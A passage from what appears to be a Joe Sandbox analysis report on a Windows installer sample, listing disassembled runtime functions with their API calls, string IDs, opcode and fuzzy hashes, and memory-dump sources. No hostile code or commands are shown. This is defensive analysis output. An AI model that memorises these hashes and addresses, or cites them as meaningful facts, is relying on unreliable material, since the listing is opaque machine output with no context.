                                        • API String ID:
                                        • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                        • Instruction ID: 62893c6b113a85985dc837a421b9eb8962cd7396e455d8205425f42b651558de
                                        • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                        • Instruction Fuzzy Hash: FC3114277A444147CB0CCE3BCD1279F91935BD426A75ECF396D05DEF65D52CD8224144
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                                        • Instruction ID: 8181d3a4bf9fb9e9d7ce21ad3db717d88ef3ad68c5f2407f85fc387f4de0397b
                                        • Opcode Fuzzy Hash: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                                        • Instruction Fuzzy Hash: 66219077320A0647E74C8A38D83737532D1A705318F98A66DEA6BCE2C2D73AC457C385
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                        • Instruction ID: 3f34755bfb8a4a87962900a0a6531bc20035cec9772fa717e4fb7b36b537330d
                                        • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                        • Instruction Fuzzy Hash: 90E08C72A16238EBCB10CBC8EA00E9AB3ECEB45A14B220097B511D3A20D270DF00C7D0
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 152ca77b835acdaa31470eaeb3eb3d3d2907b0f4df8f431f6db191a7075f4f47
                                        • Instruction ID: 9e775abeed684ca77467d17cca6977048c68fff2285a19e0a564aa4dd6adc1c9
                                        • Opcode Fuzzy Hash: 152ca77b835acdaa31470eaeb3eb3d3d2907b0f4df8f431f6db191a7075f4f47
                                        • Instruction Fuzzy Hash: 27C002F6609606AF970CCF1FA480415FBE9FAD8321324C23FA02DC3700C77198258B64
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                                        • API String ID: 3519838083-609671
                                        • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                        • Instruction ID: 29bab82513a5fb66f5eefba8e296fe517c143d3724e6b6b9d5fb7ec41301f500
                                        • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                        • Instruction Fuzzy Hash: E5D19071A05209EFCF01DFA5D980AEEB7B5FF85308F204559E055A3E60DB70A949CBA4
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: __aulldiv$H_prolog
                                        • String ID: >WJ$x$x
                                        • API String ID: 2300968129-3162267903
                                        • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                        • Instruction ID: 1293ba5e54284972405e93d2412934017aa23aed2637549ab69f570d65bc255e
                                        • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                        • Instruction Fuzzy Hash: 6C127A71D00249EFDF10CFA4C880AEEBBB5FF48318F648169E519A7660DB349965CF61
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 6CD08927
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 6CD0892F
                                        • _ValidateLocalCookies.LIBCMT ref: 6CD089B8
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 6CD089E3
                                        • _ValidateLocalCookies.LIBCMT ref: 6CD08A38
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        • Opcode ID: ef4ab316e3054ef3fd3ef0e39d2f5e87454241d9948ba19ce8fa64928080a8ba
                                        • Instruction ID: 85c432a9992262b02639e13411afe1def6621d229f8f9c806e2e2c8ac73b4598
                                        • Opcode Fuzzy Hash: ef4ab316e3054ef3fd3ef0e39d2f5e87454241d9948ba19ce8fa64928080a8ba
                                        • Instruction Fuzzy Hash: E641C030B00618EBCF01DFACDC80A9EBBB5AF45318F14815AE9185BB61D732DA15CBE1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: api-ms-$ext-ms-
                                        • API String ID: 0-537541572
                                        • Opcode ID: ac4c9336dc25ebbe0ae3b987a26a906652040432513b1d5b2c368c7138c04a10
                                        • Instruction ID: ef91a93c78aa5f17da8fe1a68a0d397adc0c5d3a8a82884a0d8c0e106ba1e570
                                        • Opcode Fuzzy Hash: ac4c9336dc25ebbe0ae3b987a26a906652040432513b1d5b2c368c7138c04a10
                                        • Instruction Fuzzy Hash: F921D831E1D221EBDB214B69EC48B4A3778AF437A8F190611E955ABEA1F734DD01C7E0
                                        APIs
                                        • GetConsoleCP.KERNEL32(?,6CD19EF0,?), ref: 6CD1AD19
                                        • __fassign.LIBCMT ref: 6CD1AEF8
                                        • __fassign.LIBCMT ref: 6CD1AF15
                                        • WriteFile.KERNEL32(?,6CD248D6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CD1AF5D
                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CD1AF9D
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CD1B049
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: FileWrite__fassign$ConsoleErrorLast
                                        • String ID:
                                        • API String ID: 4031098158-0
                                        • Opcode ID: e229fabc726bcf00f72682428c217618e46e3d986f7c248eb58114752686c5c1
                                        • Instruction ID: c1141da113ba223e3bfac64bfdc0d2045f1edfb77da5e65c47299e77fbace56b
                                        • Opcode Fuzzy Hash: e229fabc726bcf00f72682428c217618e46e3d986f7c248eb58114752686c5c1
                                        • Instruction Fuzzy Hash: 30D1CFB1E042589FCF15CFA8D8809EDBBB5FF09314F240169E869BBB51D731994ACB60
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 6CBD2F95
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 6CBD2FAF
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 6CBD2FD0
                                        • __Getctype.LIBCPMT ref: 6CBD3084
                                        • std::_Facet_Register.LIBCPMT ref: 6CBD309C
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 6CBD30B7
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                        • String ID:
                                        • API String ID: 1102183713-0
                                        • Opcode ID: 2f2846ccbcc729fa5c75e20a6da6a6da8b1c450ad1224f294eeb30119c521d6d
                                        • Instruction ID: 543182d5dfc9c258cf647ebcb8218592975db32873cf69416b2cd490a4cae8dd
                                        • Opcode Fuzzy Hash: 2f2846ccbcc729fa5c75e20a6da6a6da8b1c450ad1224f294eeb30119c521d6d
                                        • Instruction Fuzzy Hash: 0C4158B1E002548FCB14CF98C858B9EBBF4FF54728F094129D859AB751E735A944CBE2
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: __aulldiv$__aullrem
                                        • String ID:
                                        • API String ID: 2022606265-0
                                        • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                        • Instruction ID: 1130b498a4351d0e049cf0443de04020d69f2e6c1c101a15232a86bad0cc05a1
                                        • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                        • Instruction Fuzzy Hash: D42164B1901619FBDF108F988C40DDF7E69EB417AAF60C326B624625B0E2715D60D7B1
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 6CD486F1
                                          • Part of subcall function 6CD57173: __EH_prolog.LIBCMT ref: 6CD57178
                                        • __EH_prolog.LIBCMT ref: 6CD488F9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: IJ$WIJ$J
                                        • API String ID: 3519838083-740443243
                                        • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                        • Instruction ID: a755a7452d7b0df7281084231cfc69e3f451518ac9a3f0962bcc3c5696030154
                                        • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                        • Instruction Fuzzy Hash: DB71AF70900654DFDB14DFA4C854BDEB7F0BF15348F1080AAD959ABBA1CB74BA08CBA5
                                        APIs
                                        • _free.LIBCMT ref: 6CD248FD
                                        • _free.LIBCMT ref: 6CD24926
                                        • SetEndOfFile.KERNEL32(00000000,6CD2350C,00000000,6CD19EF0,?,?,?,?,?,?,?,6CD2350C,6CD19EF0,00000000), ref: 6CD24958
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CD2350C,6CD19EF0,00000000,?,?,?,?,00000000,?), ref: 6CD24974
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFileLast
                                        • String ID: 8Q
                                        • API String ID: 1547350101-4022487301
                                        • Opcode ID: d29d2676992ad746a75e59b7685971687e87a0a6cbbd71b7caa934e660aaf0ca
                                        • Instruction ID: 851f68a390e689bb03c44435444d1c4ee46221e3422a8269011f2b191b70e7c3
                                        • Opcode Fuzzy Hash: d29d2676992ad746a75e59b7685971687e87a0a6cbbd71b7caa934e660aaf0ca
                                        • Instruction Fuzzy Hash: 7541E676A006449ADB019FA8CC40BCEB7B9EF8932CF240114FE24A7BB0DB38C4098774
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 6CD5C41D
                                          • Part of subcall function 6CD5CE40: __EH_prolog.LIBCMT ref: 6CD5CE45
                                          • Part of subcall function 6CD5C8EB: __EH_prolog.LIBCMT ref: 6CD5C8F0
                                          • Part of subcall function 6CD5C593: __EH_prolog.LIBCMT ref: 6CD5C598
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: &qB$0aJ$A0$XqB
                                        • API String ID: 3519838083-1326096578
                                        • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                        • Instruction ID: 1fe4898600df388fb069ff87e788097565b561dcd444ee7afab2afcbd31dd73c
                                        • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                        • Instruction Fuzzy Hash: 22217971E01258EACF05DBE4D9809EDBBB5AF66308F60406EE416677A1DB741E0CCB25
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: J$0J$DJ$`J
                                        • API String ID: 3519838083-2453737217
                                        • Opcode ID: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                                        • Instruction ID: c1d7e722275b82435751078eee0eeac5a7a781eac532e9033d69a09e59c6ae2c
                                        • Opcode Fuzzy Hash: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                                        • Instruction Fuzzy Hash: 4411E6B0500B64CEC7208F5AC45019AFBE4FFA5708B00C90FC0A687B60C7F8A508CB65
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CD0DFD4,00000000,?,6CD0E055,6CD08A69,00000003,00000000), ref: 6CD0DF5F
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CD0DF72
                                        • FreeLibrary.KERNEL32(00000000,?,?,6CD0DFD4,00000000,?,6CD0E055,6CD08A69,00000003,00000000), ref: 6CD0DF95
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: a0bfd292d617c884da88760962c10146ac3b14a6d0d573fe1eef23ea866c98e1
                                        • Instruction ID: 81fc3f807b15298337d129d26c42f89adb405c8b15a219a3a7ee0e2182525daa
                                        • Opcode Fuzzy Hash: a0bfd292d617c884da88760962c10146ac3b14a6d0d573fe1eef23ea866c98e1
                                        • Instruction Fuzzy Hash: 65F08230A01219FBEF129F54D809B9D7FB9EB46359F204065F504E2460CB308E04DAD1
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6CD0614E
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 6CD06159
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 6CD061C7
                                          • Part of subcall function 6CD06050: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6CD06068
                                        • std::locale::_Setgloballocale.LIBCPMT ref: 6CD06174
                                        • _Yarn.LIBCPMT ref: 6CD0618A
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                        • String ID:
                                        • API String ID: 1088826258-0
                                        • Opcode ID: 7225e9970d0134b0ba84f916f4522c618d022d3cd9d542f0b079d0a9c37457a0
                                        • Instruction ID: e7d1710b9acd89939fd26c63953ef88483e716a9d69a0a56527b96c08eda5dbc
                                        • Opcode Fuzzy Hash: 7225e9970d0134b0ba84f916f4522c618d022d3cd9d542f0b079d0a9c37457a0
                                        • Instruction Fuzzy Hash: D101D475B006209BDB06DF24C854ABC7BB1FF95314B14000EDC0157790DF35AA56CBE6
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: $!$@
                                        • API String ID: 3519838083-2517134481
                                        • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                        • Instruction ID: 8d71c76d407ce7fa074510af987ae2d7e69c8a4b44596c2bae5ff0ae7cb0a4bd
                                        • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                        • Instruction Fuzzy Hash: FE128074D06249DFDF05CFA4C490ADEBBB5FF09308F14846AE446ABB61DB31A945CB60
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog__aulldiv
                                        • String ID: $SJ
                                        • API String ID: 4125985754-3948962906
                                        • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                        • Instruction ID: 00f3f981112f8fff64db61447f51235b4d08ae6726121560c831b62ba366c1a9
                                        • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                        • Instruction Fuzzy Hash: D7B14CB1E00249DFCF14CF55C9809AEBBB1FF48358FA0852ED555A7B60D730AA55CB90
                                        APIs
                                          • Part of subcall function 6CD06147: __EH_prolog3.LIBCMT ref: 6CD0614E
                                          • Part of subcall function 6CD06147: std::_Lockit::_Lockit.LIBCPMT ref: 6CD06159
                                          • Part of subcall function 6CD06147: std::locale::_Setgloballocale.LIBCPMT ref: 6CD06174
                                          • Part of subcall function 6CD06147: _Yarn.LIBCPMT ref: 6CD0618A
                                          • Part of subcall function 6CD06147: std::_Lockit::~_Lockit.LIBCPMT ref: 6CD061C7
                                          • Part of subcall function 6CBD2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6CBD2F95
                                          • Part of subcall function 6CBD2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6CBD2FAF
                                          • Part of subcall function 6CBD2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6CBD2FD0
                                          • Part of subcall function 6CBD2F60: __Getctype.LIBCPMT ref: 6CBD3084
                                          • Part of subcall function 6CBD2F60: std::_Facet_Register.LIBCPMT ref: 6CBD309C
                                          • Part of subcall function 6CBD2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6CBD30B7
                                        • std::ios_base::_Addstd.LIBCPMT ref: 6CBD211B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
